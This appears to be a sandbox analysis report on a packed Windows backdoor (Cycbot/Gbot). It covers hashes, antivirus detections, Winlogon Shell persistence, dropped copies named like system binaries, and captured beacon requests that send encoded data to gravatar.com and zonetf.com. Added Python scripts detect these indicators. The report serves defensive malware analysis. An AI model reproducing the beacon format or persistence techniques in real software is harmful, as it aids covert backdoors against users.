| Field | Value |
|---|---|
| Analysis Date | 2014-06-27 16:27:07 |
| MD5 | 65384b11a8a9d821e9b75d5a21e94596 |
| SHA1 | 383a667f581b04ccde922785bcc053359183863e |
Static Details:
| Field | Value |
|---|---|
| File type | PE32 executable for MS Windows (GUI) Intel 80386 |
| Timestamp | 2005-11-22 11:17:16 |
| Version | ProductVersion: 1.0.0.3, FileVersion: 1.0.0.3, PrivateBuild: 1686 |
| PEhash | a29b1e9ff59e26558a34c12665954db5eedb993e |
| IMPhash | 49a61c9f91380828577efbce215c05e3 |

| Section | MD5 | SHA1 | Size |
|---|---|---|---|
| .text | d688dffe645dbd92d1b1222ada9f85d8 | 7ad01f3dca73817049463b99b24acb6cea482c52 | 114688 |
| .rdata | cfbc29d6d989b553e1271b736b53f45a | 8b4a778039d1dac212d40e8c7bf975bffb1e89b6 | 1024 |
| .data | b98c34c00f7b3041f1673b36dcfe3ce5 | 0189a115f508ff96ef8920c93e1e2f6726320bd8 | 54784 |
| .apexi | 3ed17bd054c4931219318e47016cbb1b | be2fdf898ed843c4fcabd9da0a7333cd47940c91 | 1024 |

The PE timestamp is written by whoever built the file and is not evidence of when this sample was produced. `.apexi` is not a section name that mainstream compilers or linkers emit; a 1024-byte section with a custom name next to a 114 KB `.text` is the usual footprint of a packer or crypter stub (several vendors below label the file generically, e.g. Win32/Kryptik.MIA).
| Vendor | Detection |
|---|---|
| 360 Safe | Gen:Trojan.Heur.KS.1 |
| Ad-Aware | Gen:Trojan.Heur.KS.1 |
| Alwil (avast) | Cybota [Trj] |
| Arcabit (arcavir) | no_virus |
| Authentium | W32/Goolbot.G.gen!Eldorado |
| Avira (antivir) | BDS/Gbot.aida |
| CA (E-Trust Ino) | Win32/Cycbot.G!generic |
| CAT (quickheal) | Backdoor.Cycbot.B |
| ClamAV | no_virus |
| Dr. Web | BackDoor.Gbot.34 |
| Emsisoft | Gen:Trojan.Heur.KS.1 |
| Eset (nod32) | Win32/Kryptik.MIA |
| Fortinet | W32/FraudLoad.MK!tr |
| Frisk (f-prot) | W32/Goolbot.G.gen!Eldorado (generic, not disinfectable) |
| F-Secure | Gen:Trojan.Heur.KS.1 |
| Grisoft (avg) | Win32/Heri |
| Ikarus | Backdoor.Win32.Gbot |
| K7 | Backdoor ( 003210941 ) |
| Kaspersky | Trojan.Win32.Generic |
| MalwareBytes | Trojan.Agent |
| Mcafee | BackDoor-EXI.gen.i |
| Microsoft Security Essentials | Backdoor:Win32/Cycbot.G |
| MicroWorld (escan) | Gen:Trojan.Heur.KS.1 |
| Norman | winpe/Cycbot.BP |
| Rising | no_virus |
| Sophos | Mal/FakeAV-IS |
| Symantec | Backdoor.Cycbot!gen3 |
| Trend Micro | BKDR_CYCBOT.SMX |
| VirusBlokAda (vba32) | no_virus |
Runtime Details:
Process
↳ C:\malware.exe

| Event | Detail |
|---|---|
| Registry | HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ 1 |
| Registry | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝ explorer.exe,C:\Documents and Settings\Administrator\Application Data\dwm.exe |
| Creates File | C:\Documents and Settings\Administrator\Application Data\dwm.exe |
| Creates File | C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat |
| Creates File | C:\Documents and Settings\Administrator\Cookies\index.dat |
| Creates File | PIPE\lsarpc |
| Creates File | C:\Documents and Settings\Administrator\Application Data\75DE.FFC |
| Creates File | \Device\Afd\Endpoint |
| Creates File | C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat |
| Creates Process | C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft |
| Creates Process | C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe |
| Creates Process | C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp |
| Creates Mutex | WininetConnectionMutex |
| Creates Mutex | c:!documents and settings!administrator!cookies! |
| Creates Mutex | {61B98B86-5F44-42b3-BCA1-33904B067B81} |
| Creates Mutex | {655A89EF-C8EC-4587-9504-3DB66A15085F} |
| Creates Mutex | c:!documents and settings!administrator!local settings!history!history.ie5! |
| Creates Mutex | {B37C48AF-B05C-4520-8B38-2FE181D5DC78} |
| Creates Mutex | c:!documents and settings!administrator!local settings!temporary internet files!content.ie5! |
| Creates Mutex | {35BCA615-C82A-4152-8857-BCC626AE4C8D} |
| Winsock DNS | 127.0.0.1 |
| Winsock DNS | gravatar.com |
| Winsock DNS | extremerollerclub.com |
Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

| Event | Detail |
|---|---|
| Creates Process | C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe |

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

| Event | Detail |
|---|---|
| Creates Process | C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe |

Process
↳ C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
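The host-side behaviour above reduces to three checks an endpoint sweep can run: a Winlogon Shell value that lists anything besides explorer.exe, Windows system binary names (dwm.exe, csrss.exe, conhost.exe) executing from user-writable directories rather than %SystemRoot%\system32, and the GUID-style mutexes the sample creates. The Python below is an added example and not part of the sandbox output; it assumes the snapshot arrives as plain dicts and lists (how you collect it is up to your agent), and the sample snapshot is constructed from the report rows. Note that on the XP sandbox used here (the "Windows NT 5.1" User-Agent, "Documents and Settings" paths) dwm.exe does not ship with the OS at all, so that name alone is an indicator.

```python
import ntpath
import re

# Registry values and mutex names copied from the report above.
WINLOGON_SHELL = r"HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell"
PROXY_ENABLE = r"HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable"
SAMPLE_MUTEXES = {
    "{61B98B86-5F44-42b3-BCA1-33904B067B81}",
    "{655A89EF-C8EC-4587-9504-3DB66A15085F}",
    "{B37C48AF-B05C-4520-8B38-2FE181D5DC78}",
    "{35BCA615-C82A-4152-8857-BCC626AE4C8D}",
}
# Names of genuine Windows binaries that this sample reuses for its dropped copies.
# (dwm.exe first shipped with Vista; on the XP sandbox it should not exist anywhere.)
MASQUERADED_NAMES = {"dwm.exe", "csrss.exe", "conhost.exe"}
SYSTEM32 = re.compile(r"^[a-z]:\\windows\\system32\\[^\\]+$")


def shell_extra_entries(shell_value):
    """Winlogon\\Shell is normally exactly 'explorer.exe'; return everything else listed."""
    entries = [e.strip() for e in shell_value.split(",")]
    return [e for e in entries if e and e.lower() != "explorer.exe"]


def is_masquerading(image_path):
    """True when a system binary name executes from anywhere but %SystemRoot%\\system32."""
    low = image_path.lower()
    return ntpath.basename(low) in MASQUERADED_NAMES and not SYSTEM32.match(low)


def assess_host(registry, processes, mutexes):
    """Return (kind, detail) findings for one host snapshot.

    registry: {value path: data}, processes: [image path], mutexes: [name].
    """
    findings = []
    for extra in shell_extra_entries(registry.get(WINLOGON_SHELL, "explorer.exe")):
        findings.append(("persistence", "Winlogon\\Shell appends " + extra))
    if registry.get(PROXY_ENABLE) == "1":
        findings.append(("proxy", "Internet Settings\\ProxyEnable set to 1"))
    for path in processes:
        if is_masquerading(path):
            findings.append(("masquerade", path))
    for name in mutexes:
        if name in SAMPLE_MUTEXES:
            findings.append(("mutex", name))
    return findings


# Constructed snapshot, taken from the Runtime Details rows; the real csrss.exe in
# system32 is included as a control that must not fire.
SAMPLE_REGISTRY = {
    WINLOGON_SHELL: r"explorer.exe,C:\Documents and Settings\Administrator\Application Data\dwm.exe",
    PROXY_ENABLE: "1",
}
SAMPLE_PROCESSES = [
    r"C:\malware.exe",
    r"C:\WINDOWS\system32\csrss.exe",
    r"C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe",
    r"C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe",
]
SAMPLE_MUTEX_LIST = ["WininetConnectionMutex", "{61B98B86-5F44-42b3-BCA1-33904B067B81}"]

if __name__ == "__main__":
    for kind, detail in assess_host(SAMPLE_REGISTRY, SAMPLE_PROCESSES, SAMPLE_MUTEX_LIST):
        print(kind, detail)
```

The masquerade check deliberately keys on the full path rather than on the file name alone, so the genuine csrss.exe stays quiet; the Shell check splits on commas because the sample appends its path after explorer.exe instead of replacing it, which is why the desktop still comes up normally on an infected machine.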
Network Details:
| Query | Type | Answer |
|---|---|---|
| gravatar.com | A | 192.0.80.239 |
| gravatar.com | A | 192.0.80.240 |
| gravatar.com | A | 192.0.80.241 |
| gravatar.com | A | 192.0.80.242 |
| zonetf.com | A | 208.73.211.163 |
| zonetf.com | A | 208.73.211.174 |
| zonetf.com | A | 208.73.211.175 |
| zonetf.com | A | 208.73.211.193 |
| zonetf.com | A | 208.73.211.242 |
| zonetf.com | A | 208.73.211.163 |
| zonetf.com | A | 208.73.211.174 |
| zonetf.com | A | 208.73.211.175 |
| zonetf.com | A | 208.73.211.193 |
| zonetf.com | A | 208.73.211.242 |
| extremerollerclub.com | A | (no address recorded) |

| Method | URL | User-Agent |
|---|---|---|
| GET | http://gravatar.com/avatar.php?gravatar_id=f2a3889aff6fc9711a3cbcfe64067be2?v53=3&tq=gKZEtzyslLXoMNy5xQPoP0nd9IUXLoYgtJhBbSLy3unUwf7inVJlR%2FVodhhsWm7dK45EsPE93GTsU05s%2B5iIkXauPEOgE9Xtsc0gytX3t%2BkW%2F1198mh4Pl%2BVaZkbdS05ZdZ91VOHg7h84J2%2FrEOdcRJHIJqGpQbqaixD9uwUaoSFIaEYR6yeRCErf8pHvcTm3TDbRhGIhr%2FZ3Noy3xUl3h3poZnH5hkX4ZXr6WXK%2BsxgNMpzkR8ZVVoprJuvNFXklc1cB0rC5UwCS%2FPFiByi1HhSw0Gl0wz0FDmXskLYZLCnNNjP3p%2FodepO%2BA1T2LAxh | mozilla/2.0 |
| POST | http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2FMe%2BcoJuX%2BSNxlKv975Xlm5G | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) |
| POST | http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88y%2BcoJuX%2BSNxFKv975Xlm5G | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) |
| POST | http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) |
| POST | http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh8sG%2BcoJuX%2BSNw1Kv975Xlm5G | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) |
| POST | http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2F82%2BcoJtX%2BSNxr5ygm1C4lKv975Xlm5G | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) |

| Flow | Source | Destination |
|---|---|---|
| TCP | 192.168.1.1:1031 | 192.0.80.239:80 |
| TCP | 192.168.1.1:1033 | 208.73.211.163:80 |
| TCP | 192.168.1.1:1034 | 208.73.211.163:80 |
| TCP | 192.168.1.1:1035 | 208.73.211.163:80 |
| TCP | 192.168.1.1:1036 | 208.73.211.163:80 |
| TCP | 192.168.1.1:1037 | 208.73.211.163:80 |
Raw Pcap
Decoded from the hex dump: six client-side capture buffers, one per TCP flow, reconstructed from the dump's ASCII column (offset and hex columns dropped). Every request has an empty body; the beacon data travels in the tq= query parameter. Where a buffer continues past the blank line that ends the headers, the extra bytes are described after the request.

Flow 1 (to gravatar.com)
GET /avatar.php?gravatar_id=f2a3889aff6fc9711a3cbcfe64067be2?v53=3&tq=gKZEtzyslLXoMNy5xQPoP0nd9IUXLoYgtJhBbSLy3unUwf7inVJlR%2FVodhhsWm7dK45EsPE93GTsU05s%2B5iIkXauPEOgE9Xtsc0gytX3t%2BkW%2F1198mh4Pl%2BVaZkbdS05ZdZ91VOHg7h84J2%2FrEOdcRJHIJqGpQbqaixD9uwUaoSFIaEYR6yeRCErf8pHvcTm3TDbRhGIhr%2FZ3Noy3xUl3h3poZnH5hkX4ZXr6WXK%2BsxgNMpzkR8ZVVoprJuvNFXklc1cB0rC5UwCS%2FPFiByi1HhSw0Gl0wz0FDmXskLYZLCnNNjP3p%2FodepO%2BA1T2LAxh HTTP/1.0
Connection: close
Host: gravatar.com
Accept: */*
User-Agent: mozilla/2.0

Flow 2 (to zonetf.com)
POST /index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2FMe%2BcoJuX%2BSNxlKv975Xlm5G HTTP/1.1
Host: zonetf.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Length: 0
Connection: close
After the blank line the buffer holds "cB0rC5UwCS%2FPFiByi1HhS ... User-Agent: mozilla/2.0", byte for byte the tail of the flow 1 buffer at the same offsets: residue left in the capture buffer, not data sent in this flow.

Flow 3 (to zonetf.com)
POST /index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88y%2BcoJuX%2BSNxFKv975Xlm5G HTTP/1.1
Host: zonetf.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Length: 0
Connection: close
After the blank line the buffer holds the tail of an HTML page from the server:
<hr />
  <address>Microsoft-IIS/7.0</address>
  </body>
</html>

Flow 4 (to zonetf.com)
POST /index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D HTTP/1.1
Host: zonetf.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Length: 0
Connection: close
After the blank line: "se", a second blank line, then the same flow 1 residue as in flow 2.

Flow 5 (to zonetf.com)
POST /index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh8sG%2BcoJuX%2BSNw1Kv975Xlm5G HTTP/1.1
Host: zonetf.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Length: 0
Connection: close
After the blank line: the same "<hr /> ... <address>Microsoft-IIS/7.0</address> ... </html>" tail as in flow 3.

Flow 6 (to zonetf.com)
POST /index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2F82%2BcoJtX%2BSNxr5ygm1C4lKv975Xlm5G HTTP/1.1
Host: zonetf.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Length: 0
Connection: close
After the blank line: "CS%2FPFiByi1HhS ... User-Agent: mozilla/2.0", flow 1 residue again.
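The requests above share a shape that is easy to flag on a proxy or IDS log and does not depend on the domains: a long URL-encoded base64-alphabet blob in a tq= parameter, POSTs that declare Content-Length: 0 and carry everything in the query string, a second "?" spliced into the gravatar_id value, and a lowercase "mozilla/2.0" User-Agent. The Python below is an added example, not part of the sandbox output; it reassembles the captured requests from the report's own tq values, adds one constructed benign gravatar fetch as a control, and also measures how much of the five zonetf.com blobs is identical. Two things it shows that the table alone does not: the gravatar blob has 321 base64 characters, a length no valid base64 string can have, so a detector that insists on a clean decode misses it; and the five POST blobs agree on their first 148 decoded characters and differ only in the tail, so whatever "encryption" is applied leaks the message structure.

```python
import base64
import binascii
import os
import re
from urllib.parse import unquote

# tq= values copied from the report's HTTP rows, still URL-encoded as captured.
GET_TQ = "gKZEtzyslLXoMNy5xQPoP0nd9IUXLoYgtJhBbSLy3unUwf7inVJlR%2FVodhhsWm7dK45EsPE93GTsU05s%2B5iIkXauPEOgE9Xtsc0gytX3t%2BkW%2F1198mh4Pl%2BVaZkbdS05ZdZ91VOHg7h84J2%2FrEOdcRJHIJqGpQbqaixD9uwUaoSFIaEYR6yeRCErf8pHvcTm3TDbRhGIhr%2FZ3Noy3xUl3h3poZnH5hkX4ZXr6WXK%2BsxgNMpzkR8ZVVoprJuvNFXklc1cB0rC5UwCS%2FPFiByi1HhSw0Gl0wz0FDmXskLYZLCnNNjP3p%2FodepO%2BA1T2LAxh"
POST_TQ = [
    "gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2FMe%2BcoJuX%2BSNxlKv975Xlm5G",
    "gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88y%2BcoJuX%2BSNxFKv975Xlm5G",
    "gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D",
    "gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh8sG%2BcoJuX%2BSNw1Kv975Xlm5G",
    "gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2F82%2BcoJtX%2BSNxr5ygm1C4lKv975Xlm5G",
]

# The two request shapes from the pcap, headers only (both bodies are empty).
GET_GRAVATAR = (
    "GET /avatar.php?gravatar_id=f2a3889aff6fc9711a3cbcfe64067be2?v53=3&tq="
    + GET_TQ + " HTTP/1.0\r\n"
    "Connection: close\r\nHost: gravatar.com\r\nAccept: */*\r\n"
    "User-Agent: mozilla/2.0\r\n\r\n"
)
POST_ZONETF = (
    "POST /index.html?tq=" + POST_TQ[0] + " HTTP/1.1\r\n"
    "Host: zonetf.com\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n"
    "Content-Length: 0\r\nConnection: close\r\n\r\n"
)
# Constructed control: an ordinary browser fetching an avatar; must score zero.
BENIGN_GET = (
    "GET /avatar/f2a3889aff6fc9711a3cbcfe64067be2?s=80 HTTP/1.1\r\n"
    "Host: gravatar.com\r\nUser-Agent: Mozilla/5.0\r\n\r\n"
)

B64_RE = re.compile(r"[A-Za-z0-9+/]+={0,2}")


def parse_request(raw):
    """Split a raw HTTP request into (method, target, {lowercased header: value})."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            key, value = line.split(":", 1)
            headers[key.strip().lower()] = value.strip()
    return method, target, headers


def query_params(target):
    """Parse the query string by hand: the sample hides a second '?' inside the
    gravatar_id value and escapes '+' and '/' as %2B/%2F, so unquote() (never
    unquote_plus, which would turn a literal '+' into a space) is what we need."""
    if "?" not in target:
        return {}
    params = {}
    for pair in target.split("?", 1)[1].split("&"):
        key, _, value = pair.partition("=")
        params[unquote(key)] = unquote(value)
    return params


def decode_blob(value):
    """Base64-decode an already URL-decoded value, or None if it cannot be decoded.
    A data length of 4n+1 characters is impossible for base64 and is rejected."""
    padded = value + "=" * (-len(value) % 4)
    try:
        return base64.b64decode(padded, validate=True)
    except binascii.Error:
        return None


def score_request(raw):
    """Return the list of beacon traits found in one raw request."""
    method, target, headers = parse_request(raw)
    tq = query_params(target).get("tq", "")
    traits = []
    if len(tq) >= 64 and B64_RE.fullmatch(tq):
        blob = decode_blob(tq)
        size = "%d bytes" % len(blob) if blob is not None else "not a valid base64 length"
        traits.append("opaque base64-alphabet blob in tq (%s)" % size)
    if method == "POST" and tq and headers.get("content-length") == "0":
        traits.append("POST with Content-Length: 0; data carried in the query string")
    if headers.get("host", "").endswith("gravatar.com") and target.count("?") > 1:
        traits.append("second '?' spliced into the gravatar_id value")
    if headers.get("user-agent") == "mozilla/2.0":
        traits.append("lowercase 'mozilla/2.0' User-Agent")
    return traits


def common_prefix_len(encoded_values):
    """Length of the prefix shared by all blobs after URL-decoding."""
    return len(os.path.commonprefix([unquote(v) for v in encoded_values]))


if __name__ == "__main__":
    for name, req in (("gravatar GET", GET_GRAVATAR), ("zonetf POST", POST_ZONETF), ("benign", BENIGN_GET)):
        print(name, score_request(req))
    print("shared prefix across the five POST blobs:", common_prefix_len(POST_TQ))
```

The traits are scored independently so one can be dropped without losing the rest; in practice the query-string blob on an empty-body POST is the most durable signal, since the bot can change hosts and User-Agents far more easily than its transport format.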
Strings
Version resource: 040904b0, 1.0.0.3, 1686, FileVersion, PrivateBuild, ProductVersion, StringFileInfo, VarFileInfo, VS_VERSION_INFO, Translation, TIMES NEW ROMAN
Section names: .apexi, .data, .rdata
DOS stub: !This program cannot be run in DOS mode.
Module names: KERNEL32.dll, USER32.dll, OLEACC.dll
API names: CheckRemoteDebuggerPresent, CreateWindowExW, EndDialog, EnumResourceTypesW, GetFileType, GetParent, GetStartupInfoA, GetWindowInfo, HeapCreate, InitializeCriticalSection, LoadCursorW, LresultFromObject, lstrcpynW, MessageBoxW, RegisterClassExW, TlsAlloc, TlsFree, TlsGetValue
(CheckRemoteDebuggerPresent is a standard anti-debugging check; the small visible import set, with no networking or registry APIs despite the runtime behaviour above, means the real imports are resolved at run time after unpacking.)
Remaining fragments (unreadable, high-entropy): . .o..}........ a.6&.t=.....3z5..m . U..u. T]..B. .*....{[..N....i ......N3./}q.r.B... S......~>=qp...51.Y]h.. .Wk . . V. . 2C2C AqAD c`GP DB`A "EC" jjjjjj PCGF qTTac RF`# RqR" TASa UsVW V"rj .<(}<@ 11= K>VeiS 1Nx_y{ 1-R h} 1/S=[L 2S*J_3, 2u4Ld[v& 2VVxhL 3e,"4=~ &3L+K p8 svdB 5 "o.Sh `5wjL} 63w=a8 +%7aui1X "!:|8- A)A$]Ms &AIq/s b<sGZ3 BzIMZT] C$d+~L cN@/r cR!O0| D2MC^h7 dFW`sZ3 dmKKp Eh&ljn7_ FC2-y0 G-hC3G g> u7A Gv>eQF >g^|yx GZw7FWo %}h/ncKB/ h tLCl I$;8oC I9\BoC I=_t%m I@Uum: j<4m+i J)tV=D K9 &F+ (kI;i*q)%" KUW\+~0k @\KWEI K~xEB_4S]G l].$#:5 =lDv/9 @&%Lf} ljm$(V |Lq[gz l%upaX M[>,%* m6y5yr mA-Jo&_rG :M$nxhuQk# MXn+\q]" >MZL;k N0-or5 nn8 qc +#N/vk n)+wki O}3|qq |oCa"[uV pp7VK# *PQi4C P$s#g8 (qj%PAm !|Q) l r|3X%r r6:VH9M R]G4)c) r'IssK RkH.%3( |R>,L2I ")|(~T "tN1{@ ;t;sO |Tv|:Ll ueg]ks u@Z+gT !v_OG& V =R]wP w9#wkZ @!w;a@km WVB.tsJ Wv}l{a' <|ww.w6 x*:hA9 XL4l,x xR[4tI (#: Y/ y}c99IE YiX[=+ y>; ~N ynd=<gz {;Y}\+t}hx Z6,dmi{ zCwE9 -Zjs<J z]vD3!@ zwb}#g